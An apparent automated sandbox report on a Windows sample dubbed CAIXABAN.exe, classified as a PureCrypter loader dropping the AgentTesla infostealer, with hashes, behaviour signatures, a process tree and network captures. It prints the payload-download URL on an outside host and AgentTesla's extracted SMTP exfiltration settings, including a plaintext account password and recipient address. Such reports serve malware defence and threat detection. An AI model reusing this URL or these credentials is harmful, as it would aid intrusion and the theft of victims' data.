Analysis

  • max time kernel
    149s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    10-02-2023 10:50

General

  • Target

    CAIXABAN.exe

  • Size

    72KB

  • MD5

    fe3ab924e1d37874593b376966d5440f

  • SHA1

    9a6e8a32dbdac605421d987022f0bd12ed6fa415

  • SHA256

    c6f61c3603ed074cec9af4cf5b6c4f56ef5d476e4cb06e21e5c1b313128b4e0d

  • SHA512

    68c48f55f875dbd9781df595ffc2812b4e776a90a46d2e4ece114b079e3e0537d461f8da58947c4b9d029dfb5e3d30994861231d8e7280fc807a31e160dade0e

  • SSDEEP

    384:o8SOHLPTDeUzpNGkrdwTXCZB9i3oN6anxOPz0GwJ3TDCYt/9QylTW:o8rLyUfi3yLDTVW

Malware Config

Extracted

Family

purecrypter

C2

http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.humanpower.vn
  • Port:
    587
  • Username:
    sales@humanpower.vn
  • Password:
    xlA}CL.(Jj8C
  • Email To:
    brimax@ventadeasfaltorc-250enlima.pe

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe
    "C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944
    • C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe
      C:\Users\Admin\AppData\Local\Temp\CAIXABAN.exe
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1660

Network

  • flag-us
    DNS
    superbtanzaniasafaris.com
    CAIXABAN.exe
    Remote address:
    8.8.8.8:53
    Request
    superbtanzaniasafaris.com
    IN A
    Response
    superbtanzaniasafaris.com
    IN A
    198.54.116.34
  • flag-us
    GET
    http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp
    CAIXABAN.exe
    Remote address:
    198.54.116.34:80
    Request
    GET /zav/Qtpprpwy.bmp HTTP/1.1
    Host: superbtanzaniasafaris.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    cache-control: public, max-age=31536000
    expires: Sat, 10 Feb 2024 10:51:28 GMT
    content-type: image/bmp
    last-modified: Fri, 10 Feb 2023 06:52:27 GMT
    etag: "ecfb1-63e5e9ab-0;;;"
    accept-ranges: bytes
    content-length: 970673
    date: Fri, 10 Feb 2023 10:51:28 GMT
    server: LiteSpeed
    referrer-policy: no-referrer-when-downgrade
    x-turbo-charged-by: LiteSpeed
  • flag-us
    DNS
    api.ipify.org
    CAIXABAN.exe
    Remote address:
    8.8.8.8:53
    Request
    api.ipify.org
    IN A
    Response
    api.ipify.org
    IN CNAME
    api4.ipify.org
    api4.ipify.org
    IN A
    64.185.227.155
    api4.ipify.org
    IN A
    173.231.16.76
    api4.ipify.org
    IN A
    104.237.62.211
  • flag-us
    DNS
    96.108.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    96.108.152.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.110.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.110.152.52.in-addr.arpa
    IN PTR
    Response
  • 198.54.116.34:80
    http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp
    http
    CAIXABAN.exe
    17.2kB
    999.8kB
    371
    717

    HTTP Request

    GET http://superbtanzaniasafaris.com/zav/Qtpprpwy.bmp

    HTTP Response

    200
  • 8.238.20.126:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 20.42.72.131:443
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    260 B
    5
  • 8.238.20.126:80
    260 B
    5
  • 8.238.21.126:80
    260 B
    5
  • 52.109.13.62:443
    322 B
    7
  • 64.185.227.155:443
    api.ipify.org
    CAIXABAN.exe
    208 B
    4
  • 40.77.2.164:443
    260 B
    5
  • 67.26.109.254:80
    260 B
    5
  • 52.109.13.62:443
    260 B
    5
  • 8.8.8.8:53
    superbtanzaniasafaris.com
    dns
    CAIXABAN.exe
    71 B
    87 B
    1
    1

    DNS Request

    superbtanzaniasafaris.com

    DNS Response

    198.54.116.34

  • 8.8.8.8:53
    api.ipify.org
    dns
    CAIXABAN.exe
    59 B
    126 B
    1
    1

    DNS Request

    api.ipify.org

    DNS Response

    64.185.227.155
    173.231.16.76
    104.237.62.211

  • 8.8.8.8:53
    96.108.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    96.108.152.52.in-addr.arpa

  • 8.8.8.8:53
    14.110.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    14.110.152.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CAIXABAN.exe.log

    Filesize

    1KB

    MD5

    fa566c9cc0cdfc2479d186ed2a7d2078

    SHA1

    a4f5bc2d5d055a766b19f095f0a670eeda57c24b

    SHA256

    bccaf63847951e065e8af3714593cdd2f8ecb76b384c1f7c71e3cd89df314960

    SHA512

    ab3efa28f6f90dddde1472a474e26874e21248cc26603acb582ceb419e81165f4dc1044551755635dc6fd89600cbe0f1daec2ccb185fe77c68df16622e53396f

  • memory/1660-152-0x0000000006B80000-0x0000000006BD0000-memory.dmp

    Filesize

    320KB

  • memory/1660-151-0x0000000006B70000-0x0000000006B7A000-memory.dmp

    Filesize

    40KB

  • memory/1660-149-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

  • memory/1944-142-0x00000000058C0000-0x0000000005926000-memory.dmp

    Filesize

    408KB

  • memory/1944-144-0x0000000005EE0000-0x0000000005FE2000-memory.dmp

    Filesize

    1.0MB

  • memory/1944-139-0x0000000005150000-0x0000000005778000-memory.dmp

    Filesize

    6.2MB

  • memory/1944-140-0x0000000004E00000-0x0000000004E82000-memory.dmp

    Filesize

    520KB

  • memory/1944-141-0x0000000005850000-0x00000000058B6000-memory.dmp

    Filesize

    408KB

  • memory/1944-143-0x0000000005830000-0x0000000005840000-memory.dmp

    Filesize

    64KB

  • memory/1944-138-0x0000000002560000-0x0000000002596000-memory.dmp

    Filesize

    216KB

  • memory/1944-145-0x0000000006070000-0x000000000608E000-memory.dmp

    Filesize

    120KB

  • memory/1944-146-0x00000000078B0000-0x0000000007F2A000-memory.dmp

    Filesize

    6.5MB

  • memory/1944-147-0x0000000006570000-0x000000000658A000-memory.dmp

    Filesize

    104KB

  • memory/4872-132-0x0000000000DC0000-0x0000000000DD8000-memory.dmp

    Filesize

    96KB

  • memory/4872-136-0x0000000007480000-0x00000000074A2000-memory.dmp

    Filesize

    136KB

  • memory/4872-135-0x00000000067B0000-0x00000000067F0000-memory.dmp

    Filesize

    256KB

  • memory/4872-134-0x0000000005840000-0x00000000058D2000-memory.dmp

    Filesize

    584KB

  • memory/4872-133-0x0000000005DF0000-0x0000000006394000-memory.dmp

    Filesize

    5.6MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.